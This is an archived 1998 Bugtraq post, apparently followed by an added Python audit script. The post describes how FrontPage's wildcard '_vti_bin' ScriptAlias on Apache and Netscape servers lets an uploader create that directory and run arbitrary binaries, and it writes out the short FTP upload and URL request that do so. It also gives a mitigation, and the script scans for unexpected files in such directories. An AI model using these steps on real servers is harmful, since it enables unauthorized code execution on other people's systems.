Bugtraq mailing list archives
Another Frontpage Bug, with promiscuous ScriptAliases
From: pedward () WEBCOM COM (pedward () WEBCOM COM)
Date: Thu, 23 Apr 1998 18:35:34 -0700
The Apache hack that M$ distributes allows one to create ANY directory on a Frontpage enabled web server, and execute content in it. This also goes for the stock Netscape Server config that M$ recommends.

Hmm, I wonder if M$ deliberately places security holes in Unix apps so that they can claim "but Frontpage under IIS doesn't have that hole!". Mainly because IIS loads Frontpage as a DLL (I suppose). Frontpage wouldn't be anywhere near the PIG it is if it ran as an Apache module or NSAPI module...but then who has an extra 5 megs per server process to burn???

EG:

You want a rogue program to run, and the victim has anonymous uploadable FTP (or you sign up for a service and you want to run binaries on the server, but can't):

    mkdir _vti_bin
    cd _vti_bin
    put [whatever bin]

Web browser:

    http://www.victim.com/somedirectorystructure/_vti_bin/trojanfile

Boom you've got stuff runnin on that server.

They configure the Netscape server the same way. Unless you make a special NSAPI or Apache module, you're vulnerable as a freshly born ewe of a cloned sheep named Dolly!

And why is this possible???

    ScriptAlias "*/_vti_bin/*" /somedirpath

    <Object ppath="*/_vti_bin/*">
    ...
    </Object>

Solution:

Custom NSAPI / Apache module:

    NameTrans fn="prefix_fpdir" prefix_path="/somedir/cgi-bin/frontpage" name="cgi"

Plus:

Custom Stub:

    /somedir/cgi-bin/frontpage/cgi-wrapper [path to real binary]

--Perry

--
Perry Harrington System Software Engineer zelur xuniL ()
http://www.webcom.com perry.harrington () webcom com Think Blue. /\
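An audit for the condition described in the post above, added here as an example and not part of the original message or of any vendor's code: it walks a document root and reports every file under a _vti_bin directory at any depth that is not on the administrator's own list of installed files. The function names, the allowlist format and the sample file names are assumptions made for this example.

```python
import os
import tempfile

VTI_DIR = "_vti_bin"  # directory name matched by the wildcard mapping in the post


def audit_vti_bin(docroot, allowed):
    """Find files the wildcard mapping would serve as CGI but nobody installed.

    `allowed` is the admin's own set of docroot-relative paths (an assumption
    of this example). Returns sorted (relative_path, has_exec_bit) tuples.
    """
    findings = []
    for dirpath, _dirs, files in os.walk(docroot):
        rel_dir = os.path.relpath(dirpath, docroot).replace(os.sep, "/")
        # Match _vti_bin at any depth, as the pattern "*/_vti_bin/*" does.
        if VTI_DIR not in rel_dir.split("/"):
            continue
        for name in files:
            rel = f"{rel_dir}/{name}"
            if rel in allowed:
                continue
            mode = os.stat(os.path.join(dirpath, name)).st_mode
            findings.append((rel, bool(mode & 0o111)))
    return sorted(findings)


def build_sample_tree(root):
    """Constructed sample tree: one installed stub, one file in a new _vti_bin."""
    layout = {
        "_vti_bin/installed-stub": 0o755,         # constructed name, allowlisted
        "pub/incoming/_vti_bin/uploaded": 0o755,  # constructed: not installed
        "pub/incoming/readme.txt": 0o644,         # outside _vti_bin, ignored
    }
    for rel, mode in layout.items():
        path = os.path.join(root, *rel.split("/"))
        os.makedirs(os.path.dirname(path), exist_ok=True)
        with open(path, "w") as fh:
            fh.write("#!/bin/sh\n")
        os.chmod(path, mode)


if __name__ == "__main__":
    with tempfile.TemporaryDirectory() as root:
        build_sample_tree(root)
        for rel, is_exec in audit_vti_bin(root, {"_vti_bin/installed-stub"}):
            print(f"unexpected: {rel} exec_bit={is_exec}")
```

Files are reported whether or not the exec bit is set, since the page does not say how the patched servers treat non-executable files under the mapping.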